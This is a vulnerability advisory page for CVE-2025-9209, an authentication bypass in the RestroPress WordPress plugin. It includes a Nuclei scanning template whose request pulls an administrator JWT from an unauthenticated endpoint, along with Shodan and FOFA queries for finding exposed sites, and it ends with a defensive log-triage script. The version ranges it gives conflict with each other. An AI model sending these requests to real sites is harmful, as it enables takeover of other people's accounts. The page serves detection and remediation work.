
RestroPress 3.0.0-3.2.1 - Authentication Bypass

CVE-2025-9209
Verified

Description

RestroPress Online Food Ordering System WordPress plugin 3.0.0 to 3.1.9.2 contains an authentication bypass caused by exposure of user private tokens and API data via the /wp-json/wp/v2/users endpoint. Unauthenticated attackers can use the exposed data to forge JWT tokens and authenticate as other users, including administrators. Exploitation requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

10%

Published Date

April 22, 2026

Template Author

0x_akoko

CVE-2025-9209.yaml
id: CVE-2025-9209

info:
  name: RestroPress 3.0.0-3.2.1 - Authentication Bypass
  author: 0x_Akoko
  severity: critical
  description: |
   RestroPress Online Food Ordering System WordPress plugin 3.0.0 to 3.1.9.2 contains an authentication bypass caused by exposure of user private tokens and API data via /wp-json/wp/v2/users endpoint, letting unauthenticated attackers forge JWT tokens and authenticate as other users including administrators, exploit requires no authentication.
  impact: |
   Unauthenticated attackers can forge JWT tokens and authenticate as any user, including administrators, leading to full account takeover.
  remediation: |
   Update to the latest version beyond 3.1.9.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress/restropress-online-food-ordering-system-300-3192-unauthenticated-information-exposure-to-authentication-bypass-via-forged-jwt
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9209
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-9209
    epss-score: 0.09621
    epss-percentile: 0.9299
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/restropress/"
    fofa-query: body="/wp-content/plugins/restropress/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,restropress,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/restropress/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "RestroPress")'
          - 'compare_versions(version, ">= 3.0.0", "<= 3.2.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/rp/v1/auth?user_id=1 HTTP/1.1
        Host: {{Hostname}}
        Authorization: probe-{{randstr}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"token\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: jwt_token
        group: 1
        regex:
          - '"token"\s*:\s*"(eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)"'
# digest: 4a0a0047304502206dbcfc00fa46854e3ff7be927120d0286ee4dcf7b61760ae8e1e72e0fed45b75022100c82146318310e0a008c13f9cc562d42d2c8670364dc0a22c9e5bf41953ae6798:922c64590222798bb761d5b6d8e72950
Score: 9.8

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-9209
CWE ID: CWE-287

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress/restropress-online-food-ordering-system-300-3192-unauthenticated-information-exposure-to-authentication-bypass-via-forged-jwt
https://nvd.nist.gov/vuln/detail/CVE-2025-9209

Remediation Steps

Update to the latest version beyond 3.1.9.2.
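
For sites that ran an affected version before updating, the access logs can be triaged for the two routes this entry names. The following is an added example, not part of the template or the plugin; the log lines are constructed and the Combined Log Format is an assumption about the server's logging. A 200 from the auth route is only a lead, since access logs do not record whether the response body carried a token.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Routes named in this entry: the plugin auth route requested by the template
# and the core users route named in the description.
AUTH_ROUTE = "/wp-json/rp/v1/auth"
USERS_ROUTE = "/wp-json/wp/v2/users"

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines using documentation addresses, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/May/2026:10:00:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "curl/8.5"
203.0.113.7 - - [01/May/2026:10:00:02 +0000] "GET /wp-json/rp/v1/auth?user_id=1 HTTP/1.1" 200 412 "-" "curl/8.5"
203.0.113.7 - - [01/May/2026:10:00:03 +0000] "GET /wp-json/rp/v1/auth?user_id=2 HTTP/1.1" 200 409 "-" "curl/8.5"
198.51.100.20 - - [01/May/2026:10:02:10 +0000] "GET /wp-json/rp/v1/auth?user_id=1 HTTP/1.1" 401 97 "-" "Mozilla/5.0"
198.51.100.9 - - [01/May/2026:10:03:00 +0000] "GET /menu/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def new_record():
    return {"users_listing": 0, "auth_ok_ids": set(), "auth_denied": 0}

def triage(log_text):
    """Summarise, per client IP, requests to the two routes in this entry."""
    hits = defaultdict(new_record)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.rstrip("/")
        if path.startswith(USERS_ROUTE) and status == "200":
            hits[ip]["users_listing"] += 1
        elif path == AUTH_ROUTE:
            ids = parse_qs(url.query).get("user_id", [])
            if status == "200":
                hits[ip]["auth_ok_ids"].update(ids)  # which accounts were requested
            else:
                hits[ip]["auth_denied"] += 1
    return dict(hits)

def suspicious_clients(log_text):
    """Clients that got a 200 from the auth route for at least one user_id."""
    return sorted(ip for ip, h in triage(log_text).items() if h["auth_ok_ids"])

if __name__ == "__main__":
    for ip, summary in triage(SAMPLE_LOG).items():
        print(ip, summary)
```

Any client returned by `suspicious_clients` warrants a review of later authenticated activity for the listed user IDs, along with session and credential resets for those accounts.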